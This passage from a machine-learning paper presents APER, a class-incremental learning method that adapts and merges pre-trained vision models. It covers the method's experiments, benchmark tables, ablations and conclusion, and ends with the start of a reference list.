are compatible with the upstream data distribution, they could be unstable for downstream tasks. Correspondingly, we can reset the running statistics in BN and adapt to the current data via forward passing. No backpropagation is required, making it quick and simple for the pre-trained model. **Discussions**: We visualize the adapting process of APER in Figure 3. Compared to fully fine-tuning, parameter-efficient tuning adjusts the PTM towards the downstream task and preserves its generalizability. The adapted model can capture the specialized features in the incremental data, leading to better adaptivity. Since L2P and DualPrompt are based on pre-trained ViT, they cannot be deployed with CNN. In contrast, APER is a general framework that efficiently handles diverse structures. Specifically, APER can be combined with VPT/SSF/Adapter for ViT and SSF/BN Tuning for CNN. Since APER adopts the prototype-based classifier, the linear classifier \( W \) will be dropped after adaptation. 5 EXPERIMENTS This section compares APER with SOTA methods on benchmark datasets to show the superiority. Due to the overlap between pre-trained datasets and traditional CIL benchmarks, we also advocate four new benchmarks for evaluating PTM-based methods. Ablations and visualizations verify the effectiveness of APER with new classes. We also explore the performance of different PTMs in CIL. More details and extra results are included in Section C. Table 1: Average and last performance comparison on seven datasets with ViT-B/16-IN21K as the backbone. ‘IN-R/A’ stands for ‘ImageNet-R/A,’ ‘ObjNet’ stands for ‘ObjectNet,’ and ‘OmniBench’ stands for ‘OmniBenchmark.’ We report more results in Section D. The best performance is shown in bold. | Method | CIFAR B0 Inc5 | CUB B0 Inc10 | IN-R B0 Inc5 | IN-A B0 Inc10 | ObjNet B0 Inc10 | OmniBench B0 Inc30 | VTAB B0 Inc10 | |-----------------|---------------|--------------|--------------|---------------|-----------------|--------------------|---------------| | | A | A | A | A | A | A | A | | Fine tune | 38.90 | 20.17 | 26.08 | 13.96 | 21.61 | 10.79 | 21.60 | | Finetune Adapter| 60.51 | 49.32 | 66.84 | 52.99 | 47.59 | 40.28 | 43.05 | | LwF | 46.29 | 41.44 | 59.03 | 48.07 | 39.17 | 26.47 | 35.93 | | SDC | 68.51 | 63.05 | 60.62 | 66.33 | 52.17 | 46.65 | 33.52 | | L2P | 85.94 | 79.93 | 67.05 | 66.25 | 59.22 | 47.16 | 38.48 | | Dual Prompt | 87.87 | 81.15 | 77.47 | 66.54 | 63.31 | 55.22 | 52.56 | | CODA Prompt | 89.11 | 81.96 | 84.00 | 73.37 | 64.42 | 55.08 | 48.51 | | Simple CIL | 87.57 | 81.26 | 92.20 | 86.73 | 62.58 | 54.55 | 60.50 | | APER w/ Finetune| 87.67 | 81.57 | 91.82 | 86.56 | 70.11 | 62.28 | 61.57 | | APER w/ VPT-Shallow| 84.57 | 81.32 | 90.51 | 86.66 | 66.32 | 57.32 | 54.15 | | APER w/ VPT-Deep| 88.46 | 82.17 | 91.02 | 84.99 | 68.79 | 60.48 | 50.59 | | APER w/ SSF | 87.78 | 81.98 | 91.72 | 86.13 | 68.94 | 60.60 | 62.81 | | APER w/ Adapter | 90.65 | 85.15 | 92.21 | 86.73 | 72.35 | 64.33 | 60.53 | 5.1 IMPLEMENTATION DETAILS Dataset: Following (Wang et al., 2022d; Yu et al., 2020), we evaluate the performance on CIFAR100 (Krizhevsky et al., 2009), CUB200 (Wah et al., 2011), and ImageNet-R (Hendrycks et al., 2021a). Since PTMs are often trained with ImageNet21K (Deng et al., 2009), evaluating PTM-based methods with ImageNet is meaningless. Hence, we advocate four new datasets that have large domain gap with ImageNet, namely ImageNet-A (Hendrycks et al., 2021b), ObjectNet (Barbu et al., 2019), Omnibenchmark (Zhang et al., 2022) and VTAB (Zhai et al., 2019). Among them, ImageNet-A and ObjectNet contain challenging samples that ImageNet pre-trained models cannot handle, while Omnibenchmark and VTAB contain diverse classes from multiple complex realms. To construct the CIL task, we sample 200 classes from ObjectNet and ImageNet-A, and 300 from Omnibenchmark. We sample 5 datasets from VTAB, each containing 10 classes, to construct the cross-domain CIL setting. Following (Rebuffi et al., 2017b), we shuffle the classes with the same random seed and split them into ‘B/Base-m, Inc-n.’ It means the first dataset contains m classes, and each following dataset contains n classes. m = 0 means the total classes are equally divided into each task. Comparison methods: We first compare to SOTA PTM-based CIL methods L2P (Wang et al., 2022c), DualPrompt (Wang et al., 2022d), and CODA-Prompt (Smith et al., 2023). We also modify classical CIL methods LwF (Li & Hoiem, 2017), SDC (Yu et al., 2020), iCaRL (Rebuffi et al., 2017b), LUCIR (Hou et al., 2019), DER (Yan et al., 2021), FOSTER (Wang et al., 2022a), MEMO (Zhou et al., 2023b), FACT (Zhou et al., 2022a) to utilize the same PTM as the initialization. Apart from SimpleCIL, we also report the baseline, sequentially tuning the model, denoted as Finetune. Training details: We use PyTorch (Paszke et al., 2019) to deploy all models on Tesla V100 with the same network backbone. As there are various PTMs publicly available (Wightman, 2019), we follow (Wang et al., 2022e) to choose the most representative ones, denoted as ViT-B/16-IN1K and ViT-B/16-IN21K. Both are pre-trained on ImageNet21K, while the former is additionally finetuned on ImageNet1K. During adaptation, we train the model with a batch size of 48 for 20 epochs and use SGD with momentum for optimization. The learning rate starts from 0.01 and decays with cosine annealing. The prompt length p is 5 for VPT, and the projection dim r is 16 for Adapter. The source code will be publicly available upon acceptance. Evaluation Metrics: Denote the accuracy after the b-th stage as $A_b$, we follow (Rebuffi et al., 2017b) to use $A_B$ (last stage performance) and $\bar{A} = \frac{1}{B} \sum_{b=1}^{B} A_b$ (average performance) for evaluation. 5.2 BENCHMARK COMPARISON We report the incremental performance against SOTA methods in Table 1, where all methods are based on the pre-trained ViT-B/16-IN21K. We also train these models with pre-trained ViT-B/16-IN1K and show the incremental trend in Figure 4(a)–4(f). These data splits include settings with large and small base classes for a holistic evaluation. Firstly, we can infer that the embeddings of PTMs are generalizable and can be directly applied for CIL to beat the SOTA. Specifically, the baseline SimpleCIL outperforms DualPrompt by 20% on CUB and 8% on ImageNet-A in terms of $A_B$. However, strong PTMs can be further improved if they are adapted by APER, as downstream tasks have a large domain gap with the pre-trained dataset. Specifically, we find APER consistently outperforms SimpleCIL in seven benchmark datasets. In contrast, sequentially finetuning the model suffers severe forgetting, which verifies the effectiveness of the adapt and merge protocol. Since APER only requires tuning the PTM in the first stage, it requires less training time and extra parameters than L2P and DualPrompt, as shown in Figure 1. Among the variations of adapting techniques, we find SSF and Adapter are more efficient than VPT. We also Figure 4: (a)~(f): Incremental performance with ViT-B/16-IN1K as the backbone when half of the total classes are base classes. (g)~(h): Incremental performance when using ResNet18 as backbone. Since L2P and Dualprompt cannot be deployed with ResNet, we do not report their performance. APER consistently improves the performance of different backbones, i.e., ViT and CNN. ‘OBenchmark’ stands for ‘OmniBenchmark.’ compare to SOTA traditional CIL methods and modify their backbones into pre-trained ViT for a fair comparison. However, we can infer from Table 2 that these methods work poorly without exemplars. Apart from ViTs, APER also works well with pre-trained CNNs. We adopt the pre-trained ResNet18 (He et al., 2016) for evaluation and plot the incremental performance in Figure 4(g)~4(h). Results show that APER consistently boosts the performance of pre-trained ViTs and CNNs. See full results in Section D. Lastly, as shown in Table 1, the performance on typical benchmarks is approaching saturation as they have a small domain gap with ImageNet. By contrast, due to the large domain gap between our newly established benchmarks and ImageNet, there is still space for improvement, indicating the effectiveness and necessity of these new benchmarks. We also consider a more challenging TV series incremental learning task in Section C.1. 5.3 Ablation Study Downscale features: Since the feature of APER is aggregated with PTM and adapted model, which is twice that of a PTM. We conduct an ablation with APER w/ SSF on CIFAR100 Base50 Inc5 to show whether these features are essential for CIL. Specifically, we train a PCA (Pearson, 1901) model in the first stage to reduce embedding dimension for the following stages. Denote the target dimension as $k$, we train the PCA model $\text{PCA}([\phi^*(x), \phi(x)] : \mathbb{R}^d \rightarrow \mathbb{R}^k$, and append it to the feature extractor. Hence, the features and prototypes are projected to $k$ dimensions. We plot the performance with the change of $k$ in Figure 5(a). Specifically, APER obtains competitive performance to DualPrompt (with 768 dims) even if the features are projected to 50 dims. We also experiment by randomly sampling $k$ features from the original feature space and report the results in Figure 5(b). The conclusions are consistent with the former ones, showing that randomly sampling 200 dimensions of APER achieves the same performance scale as DualPrompt. The accuracy-dimension curves are shown in Figure 5(c). Sub-modules: Since APER is concatenated with PTM and adapted model, we conduct ablations on ImageNet-A Base100 Inc5 with ViT-B/16-IN21K to compare APER w/ Finetune and its sub-modules. Specifically, we build SimpleCIL with $\phi(\cdot)$ and $\phi^*(\cdot)$, respectively, denoted as SimpleCIL-PTM and SimpleCIL-Adapted. The former represents the capability of PTM, while the latter stands for the power of the adapted model. Both are compositional modules in APER. Besides, we build SimpleCIL based on concatenated pre-trained ViT-B/16-IN21K and ViT-B/16-IN1K, denoted as SimpleCIL-21K+1K. It utilizes the aggregated features of two embedding functions, which has the same dimension as APER. As shown in Figure 5(d), SimpleCIL-Adapted outperforms SimpleCIL-PTM, indicating the importance of model adaptation. However, adapting the model also overwrites the high-level features, which reduces the model’s generalizability. The adapted model suffers larger performance degradation than vanilla SimpleCIL, indicating the effect of generalizability in resisting forgetting. APER outperforms every sub-module with unified adaptivity and generalizability. **Different PTMs:** Observing the performance gap between ViT-B/16-IN21K and ViT-B/16-IN1K, we seek to explore different kinds of PTMs, i.e., ResNet18/50/152 (He et al., 2016), ViT-B/16-IN1K/21K, ViT-L/16-IN1K, ViT-B/16-DINO (Caron et al., 2021), ViT-B/16-SAM (Chen et al., 2022b), ViT-B/16-MAE (He et al., 2022b), ViT-B/16-CLIP (Radford et al., 2021) (image encoder) for a holistic evaluation, and report the results in Figure 6. We can draw three main conclusions. 1) Pre-trained ViTs show better generalizability than ResNets. 2) Larger ViTs generalize better than small ones, and ViTs trained with supervised loss perform better than unsupervised ones. 3) Owing to the massive training corpus and the contrastive loss, CLIP performs better than ImageNet21K pre-trained ViTs. Finally, we find APER w/ Finetune consistently improves the performance of SimpleCIL for any PTM, thus validating its effectiveness. **Visualizations:** We visualize the learned decision boundaries with t-SNE (Van der Maaten & Hinton, 2008) on CIFAR100 dataset between two incremental stages, as shown in Figure 7(a) / (b). We visualize the classes from the first and second incremental tasks with colorful dots and triangles. Correspondingly, the class prototypes are represented by squares. As we can infer from these figures, PTM works competitively, which well separates the instances into their corresponding classes. The class prototypes are situated at the center of each class, verifying their representativeness in recognition. When extending the model from the first to the second stage, we find APER performs well on both old and new classes. More visualizations are shown in Section C.4. ### 6 CONCLUSION Learning with incremental classes is of great importance in real-world applications, which requires adaptivity for updating and generalizability for knowledge transfer. In this paper, we systematically revisit CIL with PTMs and draw three conclusions. Firstly, a frozen PTM can provide generalizable embeddings for CIL, enabling a prototype-based classifier to outperform the current state-of-the-art. Secondly, due to the distribution gap between pre-trained and downstream datasets, PTMs can be further harnessed to enhance their adaptivity. To this end, we propose APER, which can be orthogonally combined with any parameter-efficient tuning method to unify generalizability and adaptivity for CIL. Lastly, due to data overlapping, traditional ImageNet-based benchmarks are unsuitable for evaluation in the era of PTM. Hence, we propose four new benchmarks to evaluate PTM-based CIL methods. Extensive experiments verify APER’s state-of-the-art performance. Future work includes exploring task-specific tuning methods and structures. **Limitations** include the restriction of exemplars. It turns into exemplar-based CIL if sufficient old class instances are available, where adaptivity can be further addressed through data rehearsal. REFERENCES Amit Alfassy, Assaf Arbelle, Oshri Halimi, Sivan Harary, Roei Herzig, Eli Schwartz, Rameswar Panda, Michele Dolfi, Christoph Auer, Kate Saenko, et al. Feta: Towards specializing foundation models for expert task applications. *arXiv preprint arXiv:2209.03648*, 2022. Rahaf Aljundi, Min Lin, Baptiste Goujaud, and Yoshua Bengio. Gradient based sample selection for online continual learning. In *NeurIPS*, pp. 11816–11825, 2019. Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E Hinton. Layer normalization. *arXiv preprint arXiv:1607.06450*, 2016. Hyojin Bahng, Ali Jahanian, Swami Sankaranarayanan, and Phillip Isola. Visual prompting: Modifying pixel space to adapt pre-trained models. *arXiv preprint arXiv:2203.17274*, 2022. Andrei Barbu, David Mayo, Julian Alverio, William Luo, Christopher Wang, Dan Gutfreund, Josh Tenenbaum, and Boris Katz. Objectnet: A large-scale bias-controlled dataset for pushing the limits of object recognition models. *NeurIPS*, 32, 2019. Eden Belouadah and Adrian Popescu. Il2m: Class incremental learning with dual memory. In *ICCV*, pp. 583–592, 2019. Mathilde Caron, Hugo Touvron, Ishan Misra, Hervé Jégou, Julien Mairal, Piotr Bojanowski, and Armand Joulin. Emerging properties in self-supervised vision transformers. In *ICCV*, pp. 9650–9660, 2021. Arslan Chaudhry, Puneet K Dokania, Thalaiyasingam Ajanthan, and Philip HS Torr. Riemannian walk for incremental learning: Understanding forgetting and intransigence. In *ECCV*, pp. 532–547, 2018. Shoufa Chen, GE Chongjian, Zhan Tong, Jiangliu Wang, Yibing Song, Jue Wang, and Ping Luo. Adaptformer: Adapting vision transformers for scalable visual recognition. In *NeurIPS*, 2022a. Xiangning Chen, Cho-Jui Hsieh, and Boqing Gong. When vision transformers outperform resnets without pre-training or strong data augmentations. In *ICLR*, 2022b. Gong Cheng, Junwei Han, and Xiaoqiang Lu. Remote sensing image scene classification: Benchmark and state of the art. *Proceedings of the IEEE*, 105(10):1865–1883, 2017. M. Cimpoi, S. Maji, I. Kokkinos, S. Mohamed, , and A. Vedaldi. Describing textures in the wild. In *CVPR*, 2014. Matthias De Lange, Rahaf Aljundi, Marc Masana, Sarah Parisot, Xu Jia, Aleš Leonardis, Gregory Slabaugh, and Tinne Tuytelaars. A continual learning survey: Defying forgetting in classification tasks. *IEEE transactions on pattern analysis and machine intelligence*, 44(7):3366–3385, 2021. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In *CVPR*, pp. 248–255, 2009. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. In *ICLR*, 2020. Arthur Douillard, Matthieu Cord, Charles Ollion, Thomas Robert, and Eduardo Valle. Podnet: Pooled outputs distillation for small-tasks incremental learning. In *ECCV*, pp. 86–102, 2020. Arthur Douillard, Alexandre Ramé, Guillaume Couairon, and Matthieu Cord. Dytox: Transformers for continual learning with dynamic token expansion. In *CVPR*, pp. 9285–9295, 2022. Robert M French. Catastrophic forgetting in connectionist networks. *Trends in cognitive sciences*, 3(4):128–135, 1999. Heitor Murilo Gomes, Jean Paul Barddal, Fabrício Enembreck, and Albert Bifet. A survey on ensemble learning for data stream classification. *CSUR*, 50(2):1–36, 2017.